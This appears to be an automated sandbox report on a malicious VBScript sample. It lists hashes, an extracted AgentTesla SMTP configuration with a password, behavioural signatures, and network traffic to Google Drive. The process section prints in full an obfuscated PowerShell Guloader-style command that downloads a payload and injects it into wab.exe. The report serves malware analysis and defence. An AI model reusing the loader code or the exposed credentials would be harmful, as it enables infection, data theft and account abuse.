Analysis
-
max time kernel
147s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05/03/2024, 09:16 UTC
Static task
static1
Behavioral task
behavioral1
Sample
arbejdsommere.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
arbejdsommere.vbs
Resource
win10v2004-20240226-en
General
-
Target
arbejdsommere.vbs
-
Size
26KB
-
MD5
f8577629aeb64e251b9cb1e099e714d0
-
SHA1
5f0a623045c49b2d7ae72bcbd66ada317e4f03e2
-
SHA256
8d506a06bb82e85988a2b5be1e4ec782667ef2b5252f16a46adcc75e92077ef7
-
SHA512
52d6f17ce06caeaa1871a510d323598fe13fb67dacc6d01eb538bf0ad329e37fac28e33e27cf29725c08a3f40fb3a6042df5d6372dbcc499f9e00c932b69479c
-
SSDEEP
768:qaIZCEG9cNFeKAqIqBW2MQK/fFXSiPwKYv:2CJcviqzjOSiPwjv
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.crane-eletronics.com - Port:
587 - Username:
pen@crane-eletronics.com - Password:
peFyHns8 - Email To:
info@spakmetaluae.com
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1712 WScript.exe 5 1712 WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 14 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1116 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 524 powershell.exe 1116 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 524 set thread context of 1116 524 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1336 powershell.exe 524 powershell.exe 1116 wab.exe 1116 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1336 powershell.exe Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 1116 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1116 wab.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1712 wrote to memory of 1336 1712 WScript.exe 28 PID 1712 wrote to memory of 1336 1712 WScript.exe 28 PID 1712 wrote to memory of 1336 1712 WScript.exe 28 PID 1336 wrote to memory of 524 1336 powershell.exe 31 PID 1336 wrote to memory of 524 1336 powershell.exe 31 PID 1336 wrote to memory of 524 1336 powershell.exe 31 PID 1336 wrote to memory of 524 1336 powershell.exe 31 PID 524 wrote to memory of 1116 524 powershell.exe 34 PID 524 wrote to memory of 1116 524 powershell.exe 34 PID 524 wrote to memory of 1116 524 powershell.exe 34 PID 524 wrote to memory of 1116 524 powershell.exe 34 PID 524 wrote to memory of 1116 524 powershell.exe 34 PID 524 wrote to memory of 1116 524 powershell.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arbejdsommere.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Fjernvarmevrks='Frosh41:\Totemic';Set-Content $Fjernvarmevrks 'Cismontane';$Tandlgeklinikkernes=Test-Path $Fjernvarmevrks;if($Tandlgeklinikkernes){exit};function Asser9 ($Liquidable){For($Folkekommunen=4; $Folkekommunen -lt $Liquidable.Length-1; $Folkekommunen+=5){$Posttyper=$Posttyper+$Liquidable.'Substring'($Folkekommunen, 1)};$Posttyper;}$Indbytningens=Asser9 ' TeahCiv,tAfsktSymppH.ersAf y: Mas/.ttr/MocsdProgrSkali ,ofvAfraeRasu.P.rsgFaglo F.eo E agAntilHa.de Rfc.Bra,cForfoCompmArtv/Jardu .nhcEpig?Disce.oenx erpQui.oColorCapitNa u= TuddvgteoSaakwUnfonBunglLigeo K.baUds,dUd,t& An i Aspd Se =Taft1SelviSlukDTitiQ.ustZ .vedskaaFPreaU DaaX sm ANonpQ,ownToptaiRemoeFociKTur,cO tipBundJDusk8AfstjGldeAGenntFo,sZ AnozP da5SpisebagkA,jerDTu ehtrim9Divel TrsSMishsProv ';$Posttyper01=Asser9 ' BariHa,hes,nsxForm ';$Afsveden = Asser9 ' tu\ ndesPhysygen.sArchw,tyroFarvw.lee6Brod4Lsty\DedeWGr,si .epn SardnonsoSkatwSpassReevPHeteoUtriwUs ueRobirBrusSDod,hGldee Un,lE.nalMang\ F.rvSul.1 Bud. G p0Pott\Broap PsyoPosow.enseNomirEngusCliohFinaeSkudlTrohlDill.Rec,eErgaxBoure.ese ';&($Posttyper01) (Asser9 'B,od$ ,veFSti,r st.osuffsBackh Ar,4Biza1Ran,2Tids=Vag,$NonpefestnPrmivPr,b: IndwNonjiTietnkrond StviFagor han ') ;&($Posttyper01) (Asser9 'Flec$.ndeAGingfprissVag,vBil eSe.udBffeeCyclnFi,e=Ande$AlumF Ti rB,kooStepsTreehFire4 Anv1.pst2Fo.s+Inte$DiasAmarkf Tons.ambvUnfueFl ed.nugeH zlnKoll ') ;&($Posttyper01) (Asser9 ' B l$Quinc Sekoforml.manu ,vimEvolb,heriKlovdEpim Sup=Afsl b s( Une(.esagUnwowBehomnondiJu.i ,quew KomiBridnBryl3Pai 2Funi_Grogp Ku r Frposparcsk,be,uppsOpk.sHund Lyds- ,idFBebu ProPInt.r,anto Benc IdeeKarasP,otsKrimIl byd Blo=Klge$Sult{ k aPUncoIUndiDsags} Ant)A.ve. BasCBlaao ricmTeknmUdspaWastnCo.sd LocLmuseiMet n CogePi.e) ,en Husa-Todds I.gpK,ltlF.coiFlo.tSpro Unha[Dommc,oleh.imiaScorrBro,] Eu 3,eks4Salv ');&($Posttyper01) (Asser9 'lymp$SploK ,ame kitrbeg,cGhazh .rsiKvareP,eufsitusB sm Sain=Subn Sk.l$Spe,c ykoForkl Banu EksmEnlibPeariLarydKoal[M,nt$Tin,cHjrsoOut.lArchuGriemDemob Sa.iL.sadSta..KallcO,tqo AuduOverndolmtUmen-Levn2 Sy ]Huk ');&($Posttyper01) (Asser9 'Be.g$TannEBrasmNit.uSynclA.naaMyecnAntitele.=Ting( k jTTchae ids Stat Udv-SuccPMurea Aktt,iljhKart Tres$ShelABestfNuncsS.elvAf,le DepdFirkeS,aan ec)Yalb Ukri- S lAMasknEndod Di Dagi(Zymo[Ung.I.ysbnAn.ht.yltPHadet OverL,se]Fri : Irl:Pokes Titi OrtzHyd.eTelp ,ust-.ptaeAdveqIcht Affe8Pied) ov. ') ;if ($Emulant) {&$Afsveden $Kerchiefs;} else {;$Posttyper00=Asser9 'TireS.emptMejsaP,rcrL,vetEst -EkshB Expi,ibotUdenswichTU,ikr R faAguinRetrs Ef f eske Fllrskns Suc,- TofSAppeoAutouDysfr SubcAutoeHemi Jonb$WrinISiden P cd nmbTorvyaltetOrchnElsdi Ti,novergScineAposnEn.os ved Uni,- TelD,nbeeindusWilitGldsiKi.knP,euaJulltdistiGrano.tvnn rue Ser,$ ForFSpelrUdm.oHerosSommhT.il4Anda1Hill2B.dg ';&($Posttyper01) (Asser9 'Bana$ BlaFPollrTtnioFlelsSmerhChec4Tote1 Ar.2,ndr=delp$Placekompn,nnev.api: Fo aA,erp.rrep CondDe,paGnubtArbeaPriv ') ;&($Posttyper01) (Asser9 ',ocuI UndmAul pZenio T,wrPalctU,wo-ImplMMulloFiskdDediu DenlC ireLock F reBFa.tiPizatH,sts RumTFrakr Oola ,omnSphesBirafMockeOpslrBurm ') ;$Frosh412=$Frosh412+'\Angrebskrigs.Var';while (-not $Lepidopteron) {&($Posttyper01) (Asser9 'Sapo$DiscLT.nse MespDiktiU.opdStaroIs.lpEgoctRe.ueAfrurbr,doSigtn Ope=s.mp( Cr,TAnstekills RentP,eu-In,xPregiaUni tFladhKnok Lege$fr tF,ishrPerio ridsR fuhUnce4Hera1 .el2Lerv)Pamp ') ;&($Posttyper01) $Posttyper00;&($Posttyper01) (Asser9 ' F rS hretVagea,temrSu.ctPedo-ankeS andlQuebe viveReetpS.rm Lang5Baha ');}&($Posttyper01) (Asser9 ' Afg$PaddATy.ksA masInteeReberOta Nonf=Phon botGdelie .ontLign-Xi,hCUnmuoViden.maatRodee ampnFuldtDy,l Papi$DuckFSeptrSuovoMarbs SkjhA,mi4Just1Tele2 Cas ');&($Posttyper01) (Asser9 'Ild.$DefeSafd.lOsteyWorkn HavgSibyeS lel orlsRadit Foru.rfte,avarMargsTric Dish= ern Cu p[Gra.SFuksy .aksvol tTrane ,semRaml.andaCAs roslu nstilvGreeepremrAgantBusc]Rumf:Ard,:HaanFLe,trSekso Pk m RadBbrugaLagds ndeeUnde6St a4RustSBihet onr Ko iMe,hnB.skgFile(Guis$ abeAWo,ksAndes GaseGabarPres)Jog. ');&($Posttyper01) (Asser9 ' rio$EjerP erroPornsA,letGrastpyroy TrapBorte panrP.la2 eol Aeth=Adju Af,l[ SanSMd.dySelus Hvat Rese ti.mfo s.Des,T SpleIsocx OrdtTref. GarEGrunnForec,ntro lecdMulti Ul,nB,ksgBesp],eca: .ve:RollAPrivSPsykCMiliI OveIPr,i.Y rkG AsceStent TolSSlett.injr f riBuganMaalgIndd(Yd,r$PrinSOtthlPro,yUnconLrergSydaeH tclPalasUddatKej uOssieMultr,atusRaml) oop ');&($Posttyper01) (Asser9 ' Ind$ A.lO EthvBizae SalrekspsSyndiEllegKunstGipssPensvSer iDuven Fl.d Forumed eEnce=obje$TripP Pi o GlosUlvet Folt CucySelvpUndeeforrr Far2parr. ElesSimuuFibrbAceps Fret Skor ,eciJupanPro gDoku( ins3Bron4P.yc7 Swa0S ud0Pudr6 ,me,Opkb3Geme6Gra 8Brad6 As.6Tede).rue ');&($Posttyper01) $Oversigtsvindue;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1116
-
-
-
Network
-
Remote address:8.8.8.8:53Requestrepository.certum.plIN AResponserepository.certum.plIN CNAMErepository.akamai.certum.plrepository.akamai.certum.plIN CNAMErepository.certum.pl.edgekey.netrepository.certum.pl.edgekey.netIN CNAMEe99038.dscb.akamaiedge.nete99038.dscb.akamaiedge.netIN A23.48.165.139e99038.dscb.akamaiedge.netIN A23.48.165.155
-
Remote address:8.8.8.8:53Requestrepository.certum.plIN A
-
Remote address:23.48.165.139:80RequestGET /ctnca.cer HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: repository.certum.pl
ResponseHTTP/1.1 200 OK
Content-Length: 959
Strict-Transport-Security: max-age=63072000; includeSubDomains
Last-Modified: Fri, 06 Mar 2020 09:56:01 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=900
Date: Tue, 05 Mar 2024 09:16:21 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestdrive.google.comIN AResponsedrive.google.comIN A172.217.169.78
-
Remote address:172.217.169.78:443RequestHEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:31 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Content-Length: 0
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-2GDSDtCErwFUZ8n5DCd3Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.78:443RequestGET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:33 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: script-src 'report-sample' 'nonce-sMrbsvWa2OEKdixeJ3Cp-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.78:443RequestHEAD /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:41 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Content-Length: 0
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce--FBbVSCTIeJ-G7Zc3zsmPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:172.217.169.78:443RequestGET /uc?export=download&id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 04 Mar 2024 22:35:23 GMT
User-Agent: Microsoft BITS/7.5
Host: drive.google.com
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 05 Mar 2024 09:16:42 GMT
Location: https://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-302DIGJXnvWDHrh8bSK8QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestdrive.usercontent.google.comIN AResponsedrive.usercontent.google.comIN A142.250.179.225
-
Remote address:8.8.8.8:53Requestdrive.usercontent.google.comIN A
-
HEADhttps://drive.usercontent.google.com/download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=downloadRemote address:142.250.179.225:443RequestHEAD /download?id=1iDQZdFUXAQTieKcpJ8jAtZz5eADh9lSs&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: drive.usercontent.google.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Manegeklovners.u32"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, 